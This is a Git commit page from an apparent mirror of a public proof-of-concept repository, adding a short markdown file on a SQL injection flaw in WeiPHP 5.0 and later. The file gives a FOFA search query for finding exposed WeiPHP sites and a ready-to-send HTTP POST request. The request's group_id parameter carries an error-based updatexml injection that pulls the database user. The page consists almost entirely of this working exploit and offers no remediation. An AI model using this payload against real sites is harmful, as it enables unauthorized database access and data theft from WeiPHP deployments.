admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create WeiPHP>=5.0 SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2023-12-07 20:57:39 +08:00 committed by GitHub
parent 3a66f60809
commit eb5dcd7767
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 18 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
WeiPHP>=5.0 SQL注入漏洞.md Normal file
View File

@ -0,0 +1,18 @@
## WeiPHP>=5.0 SQL注入漏洞
## fofa
```
app="WeiPHP"
```
## poc
```
POST /public/index.php/weixin/message/_send_by_group HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
group_id[0]=exp&group_id[1]=%29+and+updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29+--
```